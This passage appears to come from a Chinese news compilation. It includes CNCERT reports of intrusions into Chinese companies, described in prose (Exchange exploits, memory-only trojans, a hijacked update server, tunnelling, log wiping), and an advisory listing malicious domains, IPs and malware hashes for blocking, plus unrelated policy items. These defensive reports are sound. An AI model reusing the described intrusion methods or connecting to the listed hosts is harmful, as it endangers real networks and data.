日,攻击者利用窃取的管理员账号 / 密码登录被攻击系统的管理后台。 (二)软件升级管理服务器被植入后门和木马程序 2024 年 8 月 21 日 12 时,攻击者在该电子文件系统中部署了后门程序和接收被窃数据的定制化木马程序。 为逃避检测,这些恶意程序仅存在于内存中,不在硬盘上存储。木马程序用于接收从涉事单位被控个人计算机上窃取的敏感文件,访问路径为 / xxx / xxxx?flag=syn_user_policy。后门程序用于将窃取的敏感文件聚合后传输到境外,访问路径是 / xxx / xxxStats。 (三)大范围个人主机电脑被植入木马 2024 年 11 月 6 日、2024 年 11 月 8 日和 2024 年 11 月 16 日,攻击者利用电子文档服务器的某软件升级功能将特种木马程序植入到该单位 276 台主机中。 木马程序的主要功能一是扫描被植入主机的敏感文件进行窃取。二是窃取受攻击者的登录账密等其他个人信息。木马程序即用即删。 二、窃取大量商业秘密信息 (一)全盘扫描受害单位主机 攻击者多次用中国境内 IP 跳板登录到软件升级管理服务器,并利用该服务器入侵受害单位内网主机,并对该单位内网主机硬盘反复进行全盘扫描,发现潜在攻击目标,掌握该单位工作内容。 (二)目的明确地针对性窃取 2024 年 11 月 6 日至 11 月 16 日,攻击者利用 3 个不同的跳板 IP 三次入侵该软件升级管理服务器,向个人主机植入木马,这些木马已内置与受害单位工作内容高度相关的特定关键词,搜索到包含特定关键词的文件后即将相应文件窃取并传输至境外。这三次窃密活动使用的关键词均不相同,显示出攻击者每次攻击前均作了精心准备,具有很强的针对性。三次窃密行为共窃取重要商业信息、知识产权文件共 4.98GB。 三、攻击行为特点 (一)攻击时间 分析发现,此次攻击时间主要集中在北京时间 22 时至次日 8 时,相对于美国东部时间为白天时间 10 时至 20 时,攻击时间主要分布在美国时间的星期一至星期五,在美国主要节假日未出现攻击行为。 (二)攻击资源 攻击者使用的 5 个跳板 IP 完全不重复,位于德国和罗马尼亚等地,反映出其高度的反溯源意识和丰富的攻击资源储备。 (三)攻击武器一是善于利用开源或通用工具伪装躲避溯源,此次在涉事单位服务器中发现的后门程序为开源通用后门工具。攻击者为了避免被溯源,大量使用开源或通用攻击工具。 二是重要后门和木马程序仅在内存中运行,不在硬盘中存储,大大提升了其攻击行为被我分析发现的难度。 (四)攻击手法 攻击者攻击该单位电子文件系统服务器后,篡改了该系统的客户端分发程序,通过软件客户端升级功能,向 276 台个人主机投递木马程序,快速、精准攻击重要用户,大肆进行信息搜集和窃取。以上攻击手法充分显示出该攻击组织的强大攻击能力。 四、部分跳板 IP 列表 除此之外,国家互联网应急中心还发布了《美网络攻击我国某智慧能源和数字信息大型高科技企业事件调查报告》 2024 年 12 月 18 日,国家互联网应急中心 CNCERT 发布公告,发现处置两起美对我大型科技企业机构网络攻击事件。本报告将公布对其中我国某智慧能源和数字信息大型高科技企业的网络攻击详情,为全球相关国家、单位有效发现和防范美网络攻击行为提供借鉴。 一、网络攻击流程 (一)利用邮件服务器漏洞进行入侵 该公司邮件服务器使用微软 Exchange 邮件系统。攻击者利用 2 个微软 Exchange 漏洞进行攻击,首先利用某任意用户伪造漏洞针对特定账户进行攻击,然后利用某反序列化漏洞再次进行攻击,达到执行任意代码的目标。 (二)在邮件服务器植入高度隐蔽的内存木马为避免被发现,攻击者在邮件服务器中植入了 2 个攻击武器,仅在内存中运行,不在硬盘存储。其利用了虚拟化技术,虚拟的访问路径为 / owa / auth / xxx / xx.aspx 和 / owa / auth / xxx / yy.aspx,攻击武器主要功能包括敏感信息窃取、命令执行以及内网穿透等。内网穿透程序通过混淆来逃避安全软件检测,将攻击者流量转发给其他目标设备,达到攻击内网其他设备的目的。 (三)对内网 30 余台重要设备发起攻击 攻击者以邮件服务器为跳板,利用内网扫描和渗透手段,在内网中建立隐蔽的加密传输隧道,通过 SSH、SMB 等方式登录控制该公司的 30 余台重要设备并窃取数据。包括个人计算机、服务器和网络设备等;被控服务器包括,邮件服务器、办公系统服务器、代码管理服务器、测试服务器、开发管理服务器和文件管理服务器等。为实现持久控制,攻击者在相关服务器以及网络管理员计算机中植入了能够建立 websocket+SSH 隧道的攻击窃密武器,实现了对攻击者指令的隐蔽转发和数据窃取。为避免被发现,该攻击窃密程序伪装成微信相关程序 WeChatxxxxxxxx.exe。攻击者还在受害服务器中植入了 2 个利用 PIPE 管道进行进程间通信的模块化恶意程序,实现了通信管道的搭建。 二、窃取大量商业秘密信息 (一)窃取大量敏感邮件数据 攻击者利用邮件服务器管理员账号执行了邮件导出操作,窃密目标主要是该公司高层管理人员以及重要部门人员。攻击者执行导出命令时设置了导出邮件的时间区间,有些账号邮件全部导出,邮件很多的账号按指定时间区间导出,以减少窃密数据传输量,降低被发现风险。 (二)窃取核心网络设备账号及配置信息攻击者通过攻击控制该公司 3 名网络管理员计算机,频繁窃取该公司核心网络设备账号及配置信息。例如,2023 年 5 月 2 日,攻击者以位于德国的代理服务器(95.179.XX.XX)为跳板,入侵了该公司邮件服务器后,以邮件服务器为跳板,攻击了该公司网络管理员计算机,并窃取了“网络核心设备配置表”、“核心网络设备配置备份及巡检”、“网络拓扑”、“机房交换机(核心 + 汇聚)”、“运营商 IP 地址统计”、“关于采购互联网控制网关的请示”等敏感文件。 (三)窃取项目管理文件攻击者通过对该公司的代码服务器、开发服务器等进行攻击,频繁窃取该公司相关开发项目数据。例如,2023 年 7 月 26 日,攻击者以位于芬兰的代理服务器(65.21.XX.XX)为跳板,攻击控制该公司的邮件服务器后,又以此为跳板,频繁访问在该公司代码服务器中已植入的后门攻击武器,窃取数据达 1.03GB。为避免被发现,该后门程序伪装成开源项目“禅道”中的文件“tip4XXXXXXXX.php”。 (四)清除攻击痕迹并进行反取证分析为避免被发现,攻击者每次攻击后,都会清除计算机日志中攻击痕迹,并删除攻击窃密过程中产生的临时打包文件。攻击者还会查看系统审计日志、历史命令记录、SSH 相关配置等,意图分析机器被取证情况,对抗网络安全检测。 三、攻击行为特点 (一)攻击时间 分析发现,此次攻击活动主要集中在北京时间 22 时至次日 8 时,相对于美国东部时间为白天 10 时至 20 时,攻击时间主要分布在美国时间的星期一至星期五,在美国主要节假日未出现攻击行为。 (二)攻击资源 2023 年 5 月至 2023 年 10 月,攻击者发起了 30 余次网络攻击,攻击者使用的境外跳板 IP 基本不重复,反映出其高度的反溯源意识和丰富的攻击资源储备。 (三)攻击武器攻击者植入的 2 个用于 PIPE 管道进程通信的模块化恶意程序位于“c:\\windows\\system32\\”下,使用了.net 框架,编译时间均被抹除,大小为数十 KB,以 TLS 加密为主。邮件服务器内存中植入的攻击武器主要功能包括敏感信息窃取、命令执行以及内网穿透等。在相关服务器以及网络管理员计算机中植入的攻击窃密武器,使用 https 协议,可以建立 websocket+SSH 隧道,会回连攻击者控制的某域名。 四、部分跳板 IP 列表 #### 国家将加快推进互联网协议第六版(IPv6)规模部署和应用工作的通知 关于加快推进互联网协议第六版(IPv6)规模部署和应用工作的通知中网办发文〔2021〕15号各省、自治区、直辖市及新疆生产建设兵团党委网信办、发展改革委、工业和信息化厅(局)、通信管理局:互联网协议第六版(IPv6)是互联网升级演进的必然趋势、网络技术创新的重要方向、网络强国建设的基础支撑。2017年,以习近平同志为核心的党中央作出推进IPv6规模部署行动的战略决策。三年多来,各地区、各部门认真贯彻落实《推进互联网协议第六版(IPv6)规模部署行动计划》,推动IPv6规模部署取得显著进展。“十四五”时期是加快数字化发展、建设网络强国和数字中国的重要战略机遇期,我国IPv6发展处于攻坚克难、跨越拐点的关键阶段,面临不进则退、缓进亦退的风险挑战。为贯彻落实习近平总书记关于网络强国的重要思想,根据《国民经济和社会发展第十四个五年规划和2035年远景目标纲要》有关要求,全面深入推进IPv6规模部署和应用,加快促进互联网演进升级,经中央网络安全和信息化委员会同意,现就加快推进IPv6规模部署和应用工作的有关事项通知如下:一、总体要求(一)指导思想以习近平新时代中国特色社会主义思想为指导,全面贯彻党的十九大和十九届二中、三中、四中、五中全会精神,认真落实党中央、国务院决策部署,坚持以人民为中心的发展思想,立足新发展阶段,贯彻新发展理念,构建新发展格局,落实高质量发展要求,坚定不移推进IPv6规模部署和应用,以全面推进IPv6技术创新与融合应用为主线,以提升应用广度深度为主攻方向,着力建设开放创新的技术体系、性能先进的设施体系、全面覆盖的应用体系、生态良好的产业体系、系统完备的标准体系、自主可控的安全体系,实现IPv6规模部署和应用从能用向好用转变、从数量到质量转变、从外部推动向内生驱动转变,打造创新发展新优势,为建设网络强国和数字中国提供坚实支撑。(二)基本原则——政府引导、市场驱动。发挥市场在资源配置中的决定性作用,更好发挥政府作用,加强顶层规划、统筹协调、政策支持、环境营造、标准引领和督促落实,大力推进IPv6融合创新应用。——创新赋能、应用落地。积极支持IPv6技术创新、应用创新、服务创新、管理创新,充分释放IPv6技术潜能和优势,持续激发内生动力,夯实产业生态基础,大幅提升IPv6应用广度和深度。——问题导向、分类施策。聚焦解决关键环节不畅、应用程度不深、终端支持不足等问题,加强分类指导、示范引领、验证测试、监测通报,精准协同发力,突破瓶颈问题,全面提升发展水平。——系统推进、保障安全。加强前瞻性布局、全局性谋划、整体性推进,更好发挥中央、地方和各方面积极性,形成工作合力,系统推进IPv6技术、产业、网络、终端、应用、安全建设,实现协调并进。(三)工作目标到2023年末,基本建成先进自主的IPv6技术、产业、设施、应用和安全体系,形成市场驱动、协同互促的良性发展格局。IPv6活跃用户数达到7亿,物联网IPv6连接数达到2亿。移动网络IPv6流量占比达到50%,城域网IPv6流量占比达到15%。国内主要内容分发网络、数据中心、云服务平台、域名解析系统基本完成IPv6改造。新上市的家庭无线路由器全面支持并默认开启IPv6功能。县级以上政府网站、国内主要商业网站及移动互联网应用IPv6支持率显著提升。IPv6单栈试点取得积极进展,新增网络地址不再使用私有IPv4地址。到2025年末,全面建成领先的IPv6技术、产业、设施、应用和安全体系,我国IPv6网络规模、用户规模、流量规模位居世界第一位。网络、平台、应用、终端及各行业全面支持IPv6,新增网站及应用、网络及应用基础设施规模部署IPv6单栈,形成创新引领、高效协同的自驱性发展态势。IPv6活跃用户数达到8亿,物联网IPv6连接数达到4亿。移动网络IPv6流量占比达到70%,城域网IPv6流量占比达到20%。县级以上政府网站、国内主要商业网站及移动互联网应用全面支持IPv6。我国成为全球“IPv6+”技术和产业创新的重要推动力量,网络信息技术自主创新能力显著增强。之后再用五年左右时间,完成向IPv6单栈的演进过渡,IPv6与经济社会各行业各部门全面深度融合应用。我国成为全球互联网技术创新、产业发展、设施建设、应用服务、安全保障、网络治理等领域的重要力量。“十四五”IPv6规模部署和应用主要指标二、重点任务(一)强化网络承载能力1.提升IPv6网络性能和服务水平。深度优化IPv6网络,确保IPv6网络关键性能指标和服务指标与互联网协议第四版(IPv4)网络相同。深入开展接入网IPv6改造,提高接入设备IPv6支持能力。开展移动物联网核心网改造,具备为移动物联网终端分配固定IPv6地址的能力。推动IPv6与千兆光网、第五代移动通信(5G)同步规划建设和实施。持续改进IPv6网络运维保障,提升IPv6网络业务开通、故障排查等服务水平。2.增强IPv6网络互联互通能力。加快推进互联网交换中心(含新型互联网交换中心)、互联网直联点IPv6改造,新建交换中心和直联点全面支持IPv6,优先提升互联网国际出入口IPv6带宽,保障国内及国际互联网IPv6流量有效转接。3.积极推进IPv6单栈网络部署。推进5G独立组网(SA)、物联网等网络IPv6单栈试点,探索试点系统内不再使用私有IPv4地址,逐步实现网络承载、控制和管理层面的IPv6单栈部署。4.加快广电网络IPv6改造。全面推进广播电视传输网络及宽带数据网络IPv6改造,提高宽带接入网络IPv6服务能力,推动广电网络业务系统和平台的IPv6端到端贯通。加快互联网电视与交互式网络电视集成平台的IPv6改造,建设新一代支持IPv6的业务服务平台。(二)优化应用服务性能5.强化应用基础设施业务承载能力。全方位提升云服务平台、内容分发网络(CDN)的IPv6服务能力,推动数据中心、边缘云等支持IPv6,扩大IPv6服务覆盖范围,提高IPv6带宽资源占比,提升应用服务性能。推动新上线云产品和新建节点全部支持IPv6。6.推动IPv6与信息基础设施融合发展。推动人工智能、云计算、区块链、超算中心、智能计算中心等信息基础设施全面支持IPv6。(三)提升终端支持能力7.补齐家庭网络终端IPv6接入短板。加强政策指导和标准引领,推动将无线家庭终端IPv6支持要求纳入无线电发射设备型号核准环节,探索实施无线路由器、智能机顶盒、智能电视等家庭终端设备IPv6支持度评测认证,推动新生产的终端产品全面启用IPv6功能。加快存量老旧家庭网关升级替换。开展家庭终端IPv6评测评估,指导发布支持IPv6终端产品目录,引导用户加速升级换代。引导国内电商平台开展IPv6家庭终端优先推荐活动。8.完善智慧家庭IPv6产业生态。完善智慧家庭综合标准化体系建设,明确IPv6支持要求。推动提升国内主要企业的智能家居系统平台、设备产品、应用等对IPv6支持能力,打造智慧家庭IPv6产业生态。开展智慧家庭典型业务场景IPv6试点示范。9.强化物联网终端IPv6部署应用。完善物联网终端入网检测标准规范,明确IPv6网络接入要求。加强技术研发,提升物联网终端IPv6网络连接能力。推动新生产的智能家居、智能硬件等消费物联网终端,工业联网设备、传感器节点等生产物联网终端,以及智慧城市、智慧安防等公共物联网终端同步支持IPv6,默认开启IPv6功能。推进各级应急指挥信息网及业务系统IPv6升级改造。推动能源相关信息网络支持IPv6。加快企业物联网应用平台IPv6改造和存量老旧物联网终端升级替换。(四)拓展行业融合应用10.深化中央企业行业系统IPv6改造。推进中央企业集团总部、二级及以下重点企业专用网络、数据中心、门户网站、公众在线服务窗口、移动互联网应用、生产管理业务系统等全面支持IPv6。鼓励产业创新应用,打造IPv6产业应用生态圈。11.推动金融行业系统IPv6演进升级。深入推进金融机构广域网、分支机构网络、数据中心的IPv6改造。持续提高金融服务机构面向公众服务的互联网应用系统IPv6支持能力。健全IPv6监控运维体系,完善网络安全管理制度,推动金融安全防护体系全面支持IPv6,稳步推进金融行业信息化体系平滑演进升级。12.拓展工业互联网IPv6应用。推进典型行业、重点企业拓展工业互联网IPv6应用。推动工业互联网标识解析体系全面支持IPv6。开展工业互联网平台IPv6升级,打造行业和区域IPv6应用标杆。13.推动数字乡村建设IPv6应用创新发展。加快推动基于IPv6的农村信息基础设施建设,全面推动IPv6在现代农业、智慧农业、农业农村大数据平台建设中的广泛应用。14.推动IPv6与教育新型基础设施融合发展。开展教育信息化IPv6支持能力建设,推动IPv6在数字教育资源公共服务体系中的应用,深化在线教育等商业平台IPv6改造。15.推动数字医疗健康和社会保障信息化IPv6应用。推动远程医疗、医院信息化、智慧健康养老、社会保障信息化等领域服务平台支持IPv6。16.推进交通水利数字化设施IPv6应用。推动IPv6在综合交通大数据中心体系、智慧交通、智慧物流、智慧铁路、智慧水利等领域应用部署,提升智慧发展水平。17.推动自然资源与生态环境信息化IPv6部署应用。推动自然资源信息化、生态环境信息化、林草信息化等领域网络和业务系统支持IPv6。18.加快媒体行业IPv6融合应用。加强IPv6在全媒体传播体系的融合应用,推动中央媒体、省级媒体、市级媒体和县级融媒体中心建设中同步支持IPv6,深化中央重点新闻网站IPv6改造,推动新型传播平台支持IPv6。(五)加快政务应用改造19.推动电子政务公共平台IPv6改造。推动国家电子政务外网、地方政务外网、政务专网等IPv6改造。推动政务数据中心、政务云平台、智慧城市平台IPv6改造。推动新建政务网络及应用基础设施全面部署IPv6,探索开展政务网络及应用IPv6单栈化试点。20.深化政府网站IPv6改造。推动各级政府及其部门网站、政务类移动客户端IPv6升级改造。推动政务服务门户功能优化升级,支持IPv6网络访问。加强对政府网站指导检查,确保IPv6支持要求落实到位。(六)深化商业应用部署21.推进商业平台IPv6全面深度改造。全面推进互联网视频、游戏、资讯、社交、电商、生活服务等大流量商业平台IPv6深度改造,提升互联网应用IPv6浓度,推动二三级链接等深层次内容优先采用IPv6访问,实现全业务全功能支持,提高IPv6用户规模,带动IPv6流量提升。22.强化商业应用IPv6入口管理。鼓励国内移动互联网应用分发平台相关行业组织,制定行业规范,要求新上架的移动互联网应用支持IPv6。推动新上线网站及应用支持IPv6,引导存量网站及应用逐步向IPv6过渡。(七)培育创新产业生态23.推动IPv6产业链协同创新。制定发布IPv6技术演进路线图、实施指南等指导性文件,加大引导支持力度。强化IPv6行业组织力量,整合产学研用各方力量,建设IPv6产业链协同创新平台。提高IPv6技术、设备、网络、应用、服务、安全等企业的协同创新能力,优化IPv6产业链结构,打造共建共享的IPv6产业生态。24.推动IPv6应用创新。选择重点区域和特色领域开展IPv6应用试点。开展基于IPv6的下一代互联网示范城市、IPv6创新基地建设。支持IPv6与5G应用协同推广,促进面向5G的业务和商业模式创新。(八)加强关键技术研发25.开展IPv6关键核心技术研发。加强基于IPv6的新型网络体系结构技术研究。开展“IPv6+”网络产品研发与产业化,加强技术创新成果转化,不断展现IPv6技术优势。26.推动IPv6技术融合创新。推动协议、技术和业务创新,突破网络智能化、虚拟化、云化等关键技术,构建IPv6技术创新体系。积极开展网络新技术、新应用的试验验证与应用示范,不断催生新技术、新应用、新模式。(九)推动标准规范制定27.构建IPv6标准体系。推动IPv6规模部署和应用创新成果标准化,增强IPv6标准研制力量,协同推进国家标准、行业标准、团体标准制定,建立IPv6标准体系。28.积极参与国际标准制定。加强与互联网工程任务组(IETF)、欧洲电信标准化协会(ETSI)等国际标准化组织合作,积极参与IPv6相关国际标准制定。(十)强化安全保障能力29.构筑IPv6网络安全防护体系。落实网络安全等级保护制度,明确IPv6安全保护要求。加强重点领域IPv6安全防护体系建设,升级安全系统,强化复杂场景下IPv6安全保障能力。依托国家网络与信息安全信息通报机制,构建IPv6安全监测体系,提高IPv6安全态势感知、通报预警和应急响应能力。30.提升新兴领域安全保障能力。加强IPv6安全技术研究,开展IPv6核心安全技术攻关。加强IPv6环境下工业互联网、物联网、车联网、云计算、大数据、人工智能等新兴领域的安全技术、管理及机制研究。三、保障措施(一)加强组织领导各地区、各部门要加强组织领导,压实工作责任,制定具体工作方案,推进任务落实。中央网信办会同国家发展改革委、工业和信息化部等部门健全推进IPv6规模部署和应用工作统筹协调机制,加强统筹协调、整体推进和督促落实,完善专家咨询制度,及时协调解决工作中的重大问题。制定实施IPv6发展年度工作计划,压茬推进各项目标任务落实。(二)完善政策支持各相关部门要完善政策措施,优化发展环境,统筹资金,加大支持力度,引导社会资金投入。在基础电信企业业绩考核中,支持和鼓励企业积极开展IPv6相关工作。创新推进工作机制,强化政企联动、多方参与,加大技术研发、网络升级、标准制定、应用推广、安全保障工作力度,实现技术、产业、网络、应用协同推进。(三)开展监测通报优化IPv6发展监测指标体系,加强IPv6发展指标研究。完善国家IPv6发展监测平台,扩展监测范围,提高IPv6发展情况监测能力,全面掌握并及时发布IPv6发展数据。完善IPv6部署应用监测通报制度,定期开展部门、地方、企业、行业IPv6发展情况监测与通报,督促落实进度。(四)组织试点示范聚焦重点领域、优先方向和瓶颈问题,选择一批基础条件好、积极性高的重点企业、重点行业、重点部门、重点区域和城市,组织开展IPv6全链条、全业务、全场景部署和应用试点,边试点、边总结、边推广,以点促面,整体提升IPv6规模部署和应用水平。(五)加强宣传推广创新宣传形式,加大IPv6发展成果宣传力度,营造全社会共同参与推进IPv6规模部署和应用的良好氛围。组织IPv6行业交流活动,搭建行业合作平台。定期发布重点企业、重点行业、重点区域优秀案例,发挥示范引领作用。举办IPv6技术应用创新大赛,推动下一代互联网人才培养。(六)深化国际合作积极参与联合国等多边框架工作,充分利用“一带一路”倡议、金砖国家、上合组织等机制和世界互联网大会、中国—东盟信息港论坛、网上丝绸之路大会等平台,积极开展IPv6部署应用国际交流合作,共建共享美好数字世界。中央网络安全和信息化委员会办公室国家发展和改革委员会工业和信息化部2021年7月12日 #### 国家将大力推动病毒查杀等网络安全产品演进升级 9月27日 消息:今日,工信部发文称,为贯彻落实《中华人民共和国网络安全法》,积极发展网络安全产业,工业和信息化部会同有关部门起草了《关于促进网络安全产业发展的指导意见(征求意见稿)》),现面向社会公开征求意见。 其中,指导意见要求,着力突破网络安全关键技术,大力推动资产识别、漏洞挖掘、病毒查杀、边界防护、入侵防御、源码检测、数据保护、追踪溯源等网络安全产品演进升级,着力提升隐患排查、态势感知、应急处置和追踪溯源能力。加强5G、下一代互联网、工业互联网、物联网、车联网等新兴领域网络安全威胁和风险分析,大力推动相关场景下的网络安全技术产品研发。积极探索拟态防御、可信计算、零信任安全等网络安全新理念、新架构,推动网络安全理论和技术创新。 此外,指导意见还要求,积极创新网络安全服务模式,支持合法设立的认证机构依法开展网络安全认证。大力发展基于云模式的网络安全公共服务平台,提供远程实时在线的漏洞发现、网站防护、抗拒绝服务攻击、域名安全等服务。鼓励基础电信企业和云服务提供商发挥网络资源优势,面向客户提供网络安全监测预警、攻击防护、应急保障等增值服务。鼓励发展面向智慧城市建设、电子政务等领域的网络安全一体化运营外包服务。支持构建基于商用密码、指纹识别、人脸识别等技术的网络身份认证体系。 工信部表示,当前,各种形式的网络攻击、黑客入侵、恶意代码、安全漏洞层出不穷,对关键信息基础设施安全、数据安全、个人信息安全构成严重威胁。网络安全的本质是技术对抗,保障网络安全离不开网络安全技术和产业的有力支撑。 #### 国家应急处理中心:重点防范境外恶意网址和恶意IP 中国国家网络与信息安全信息通报中心发现一批境外恶意网址和恶意IP,境外黑客组织利用这些网址和IP持续对中国和其他国家发起网络攻击。这些恶意网址和IP都与特定木马程序或木马程序控制端密切关联,网络攻击类型包括建立僵尸网络、网络钓鱼、窃取商业秘密和知识产权、侵犯公民个人信息等,对中国国内联网单位和互联网用户构成重大威胁,部分活动已涉嫌刑事犯罪。相关恶意网址和恶意IP归属地主要涉及:美国、荷兰、新加坡、土耳其、墨西哥、越南等。主要情况如下: 一、恶意地址信息 (一)恶意地址:gael2024.kozow.com 关联IP地址:149.28.98.229 归属地:美国/佛罗里达州/迈阿密 威胁类型:后门 病毒家族:AsyncRAT 描述:该恶意地址关联多个AsyncRAT病毒家族样本,部分样本的MD5值为50860f067b266d6a370379e8bcd601ba。相关后门程序采用C#语言编写,主要功能包括屏幕监控、键盘记录、密码获取、文件窃取、进程管理、开关摄像头、交互式shell,以及访问特定URL等。这些病毒可通过移动存储介质、网络钓鱼邮件等方式进行传播,现已发现多个关联变种,部分变种主要针对中国境内民生领域的重要联网系统。 (二)恶意地址:185.174.101.218 归属地:美国/加利福尼亚州/洛杉矶 威胁类型:后门 病毒家族:RemCos 描述:该恶意地址关联到多个RemCos病毒家族样本,部分样本的MD5值为56f94f8aed310e90b5f513b1eb999c69。RemCos是一款远程管理工具,自2016年起就已存在。攻击者可以利用受感染系统的后门访问权限收集敏感信息并远程控制系统。最新版本的RemCos可以执行各种恶意活动,包括键盘记录、截取屏幕截图和窃取密码。 (三)恶意地址:counterstrike2-cheats.com 关联IP地址:45.137.198.211 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:僵尸网络 病毒家族:mirai 描述:这是一种Linux僵尸网络病毒,通过网络下载、漏洞利用、Telnet和SSH暴力破解等方式进行扩散,入侵成功后可对目标网络系统发起分布式拒绝服务(DDoS)攻击。 (四)恶意地址:bot.merisprivate.net 关联IP地址:194.120.230.54 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:僵尸网络 病毒家族:mirai 描述:这是一种Linux僵尸网络病毒,通过网络下载、漏洞利用、Telnet和SSH暴力破解等方式进行扩散,入侵成功后可对目标网络系统发起分布式拒绝服务(DDoS)攻击。 (五)恶意地址:localvpn.anondns.net 关联IP地址:37.120.141.162 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:后门 病毒家族:Nanocore 描述:该恶意地址关联到Nanocore病毒家族样本,部分样本的MD5值为954866a242963b6a2caadf0c5b7df5e1,Nanocore是一种远程访问木马,被用于间谍活动和系统远程控制。攻击者获得感染病毒的主机访问权限,能够录制音频和视频、键盘记录、收集凭据和个人信息、操作文件和注册表、下载和执行其它恶意软件负载等。Nanocore还支持插件,能够扩展实现各种恶意功能,比如挖掘加密货币,勒索软件攻击等。 (六)恶意地址:bueenotgay.duckdns.org 关联IP地址:217.15.161.176 归属地:新加坡 威胁类型:僵尸网络 病毒家族:MooBot 描述:这是一种Mirai僵尸网络的变种,常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等实施入侵,攻击成功后,受害设备将下载并执行MooBot的二进制文件,进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。 (七)恶意地址:sidiaisi168.com 关联IP地址:154.211.96.238 归属地:新加坡 威胁类型:后门 病毒家族:Farfli 描述:该恶意地址关联到多个Farfli病毒家族样本,部分样本的MD5值为b860f4174f47f3622d7175f1e66b49c2。Farfli是一种远控木马,能够通过网络下载、软件捆绑、网络钓鱼等多种方式传播。其允许远程攻击者执行多种远控操作,比如监控电脑屏幕、键盘记录、下载安装任意文件、窃取隐私信息,甚至还可以控制感染的计算机发起DDoS攻击。 (八)恶意地址:94.122.78.238 归属地:土耳其/伊斯坦布尔省/伊斯坦布尔 威胁类型:僵尸网络 病毒家族:gafgyt 描述:这是一种基于因特网中继聊天(IRC)协议的物联网僵尸网络病毒,主要通过漏洞利用和内置的用户名、密码字典进行Telnet和SSH暴力破解等方式进行扩散传播。可对网络设备进行扫描,攻击网络摄像机、路由器等IoT设备,攻击成功后,利用僵尸程序形成僵尸网络,对目标网络系统发起分布式拒绝服务(DDoS)攻击,可能造成大面积网络瘫痪。 (九)恶意地址:windowwork.duckdns.org 关联IP地址:103.88.234.204 归属地:墨西哥/墨西哥联邦区/墨西哥城 威胁类型:后门 病毒家族:RemCos 描述:该恶意地址关联到多个RemCos病毒家族样本,部分样本的MD5值为6dfbc8b366bd1f4ebd33695b8f8fa521。RemCos是一款远程管理工具,自2016年起就已存在。攻击者可以利用受感染系统的后门访问权限收集敏感信息并远程控制系统。最新版本的RemCos可以执行各种恶意活动,包括键盘记录、截取屏幕截图和窃取密码。 (十)恶意地址:cnc.loctajima.website 关联IP地址:103.28.35.146 归属地:越南/胡志明市 威胁类型:僵尸网络 病毒家族:MooBot 描述:这是一种Mirai僵尸网络的变种,常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等实施入侵,攻击成功后,受害设备将下载并执行MooBot的二进制文件,进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。 二、排查方法 (一)详细查看分析浏览器记录以及网络设备中近期流量和DNS请求记录,查看是否有以上恶意地址连接记录,如有条件可提取源IP、设备信息、连接时间等信息进行深入分析。 (二)在本单位应用系统中部署网络流量检测设备进行流量数据分析,追踪与上述网络和IP发起通信的设备网上活动痕迹。 (三)如果能够成功定位到遭受攻击的联网设备,可主动对这些设备进行勘验取证,进而组织技术分析。 三、处置建议 (一)对所有通过社交平台或电子邮件渠道接收的文件和链接保持高度警惕,重点关注其中来源未知或不可信的情况,不要轻易信任或打开相关文件。 (二)及时在威胁情报产品或网络出口防护设备中更新规则,坚决拦截以上恶意网址和恶意IP的访问。 (三)向有关部门及时报告,配合开展现场调查和技术溯源。 转载自:国家网络安全通报中心 #### 国家未来互联网!全球规模最大的互联网试验设施主干网开通! 4月20日 “未来互联网试验设施FITI”高性能主干网开通仪式在清华大学举行 FITI是当前全球规模最大的互联网试验设施 是我国信息领域第一个国家重大科技基础设施项目 未来网络试验设施的重要组成部分 在FITI的助力下 我国拥有作为下一代互联网开始标志的IPv6地址数于4月初跃居全球第一 FITI主干网核心节点分布在全国31个省区市 核心节点间的带宽达到200G 同时支持不少于4096个大规模试验网络 实现了与国内外IPv4/IPv6试验设施的互联互通 4月初,我国拥有的IPv6地址数一举超过美国跃居全球第一,这背后就是FITI的助力。FITI成为目前世界上规模最大的未来互联网试验设施。 值得关注的是,FITI不仅基于纯IPv6网络,同时可以支持下一代互联网真实源地址验证体系SAVA(Source Address Validation Architecture)。SAVA支持互联网的端系统地址精确定位和溯源,突破了下一代互联网体系结构的安全可信关键核心技术,并在国家重要部门及重点行业网络中实现了规模化应用,取得了重大的社会和经济效益。换言之,FITI是一张致力于对互联网核心关键技术探索和实践的大网。 同时,FITI是清华等40所高校承担建设的又一个重大互联网实验平台,是继CERNET和CERNET2之后的第三张大网。 与CERNET和CERNET2相比,FITI的特点是更加面向全国各类科研单位的未来互联网研究和探索。FITI以推动人类网络空间命运共同体的发展为己任,是面向未来互联网的国家重大试验基础设施,将成为我国实施“网络强国”的重要战略科技支撑。 #### 国家版权局规范摄影作品版权秩序 整治图片侵权盗版 6月11日 消息:今日,国家版权局发布《关于规范摄影作品版权秩序的通知》对摄影作品版权秩序进行了规范。 其中,国家版权局称,图库经营单位应当健全版权管理机制,规范版权运营活动,与摄影作品著作权人订立合同,在双方约定的权限范围内行使相关权利。图库经营单位向用户提供的摄影作品应当权属清晰且获得合法授权,并指明作者及授权方式、授权期限和授权范围等必要信息。图库经营单位应当合理收取版权许可使用费,并明示使用费价格。 同时,图库经营单位应当本着诚实信用的原则开展授权和维权活动,不得对不享有版权的摄影作品虚构版权,不得向他人提供未获授权的摄影作品及主张权利,不得以投机性牟利为目的实施不正当维权行为。图库经营单位对著作权保护期届满及著作权人放弃财产权的摄影作品进行收集、整理、编辑并向用户提供的,应当指明作者及可使用的权利范围等必要信息,且不得侵犯作者依法享有的其他权利,不得以版权许可使用费的名义收取费用。 此外,摄影作品著作权人及使用者、图库经营单位、摄影行业组织等应当共同探索合理、便捷的摄影作品授权体系,进一步完善摄影作品授权交易机制,促进摄影作品的合法有序传播。摄影行业组织应当在推动版权自律、公平交易、争议调解、合法维权等方面发挥积极作用,并积极探索建设面向中小微企业等用户的微利图库和面向扶贫、科教等领域的公益图库。 最后,国家版权局强调,各级著作权行政管理部门要加强日常监管,加大惩处力度,依法严厉打击摄影作品侵权盗版行为,严肃查处虚构摄影作品版权、进行虚假授权的行为。 #### 国家网信办:2019二季度关闭违法网站2899家 7月30日 消息:日前,国家网信办公布了 2019 年二季度全国网信行政执法工作情况。据统计,全国网信系统依法约谈网站 648 家,警告网站 636 家,暂停更新网站 56 